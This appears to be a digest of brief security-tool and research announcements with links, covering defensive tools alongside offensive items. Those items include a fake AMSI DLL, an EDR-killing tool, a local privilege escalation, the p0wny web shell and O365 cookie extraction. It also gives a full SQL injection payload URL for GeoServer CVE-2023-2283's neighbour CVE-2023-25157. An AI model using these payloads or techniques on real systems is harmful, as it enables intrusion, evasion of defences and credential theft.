OpenWEC
A free & open source (GPLv3) implementation of a Windows Event Collector server running on GNU/Linux & written in Rust.
Blink v1.0
Blink is a brand new unprivileged userspace virtual machine that can emulate x86-64-linux binaries on any POSIX platform.
🛠 yara-ttd
Use YARA rules on Time Traveil Debugging traces. The idea behind
yara-ttd
is to use the trace files recorded by TTD withyara
itself to defeat packers #analysis #tools #sstic #debugging #malware #software #informatique
osslsigncode
OpenSSL based Authenticode signing PE/MSI/Java CAB files
https://github.com/mtrojnar/osslsigncode
https://tij.me/blog/finding-and-utilising-leaked-code-signing-certificates/
PE with spoofed sections
An undocumented trick to embed executable code within (what appears to be) a read-only PE section. The proof-of-concepts described above involve appending the payload to the end of the NT headers, but it is also possible to embed executable code within the headers.
Nice, x86matthew. Ping @siri_urz
https://secret.club/2023/06/05/spoof-pe-sections.html
https://secret.club/assets/pe_section_spoof/pe_section_spoof.zip
Abusing Microsoft SQL via ADSI
CVE-2023-2283 PoC
Public key auth bypass in libssh
fakeAmsiDll.cpp
Simply return `S_OK / AMSI_RESULT_CLEAǸ for every command
https://gist.github.com/eversinc33/beb43d05695de77a030c97ab769682ca
🛠 nbutools
Tools for offensive security of NetBackup infrastructures
Terminator
Reproducing Spyboy technique to terminate all EDR/XDR/AVs processes
DavRelayUp
An universal no-fix local privilege escalation in domain-joined Windows workstations where LDAP signing is not enforced
PoC CVE-2023-25157 by @parzel
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=osm:osm_places&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+current_user%29+AS+INTEGER%29%29+--+%27%29+%3D+true
ObjectWalker v2.1.6 by Rémi Gascou
#Python module to explore the object tree to extract paths to interesting targets / objects in memory
✨️ New p0wny@shell release!
➡️ https://github.com/flozz/p0wny-shell
It now tries different execution functions (exec, shell_exec, system, passthru, popen, proc_open) to run commands to bypass disabled functions! 😎️
Process_String_Extractor.ps1
This scriplet is also able to extract Cookies for Microsoft O365 / Microsoft Azure PTC Attack
https://gist.github.com/LuemmelSec/3f2c4b7642dc7b2ae63601ed02ec3db5
247365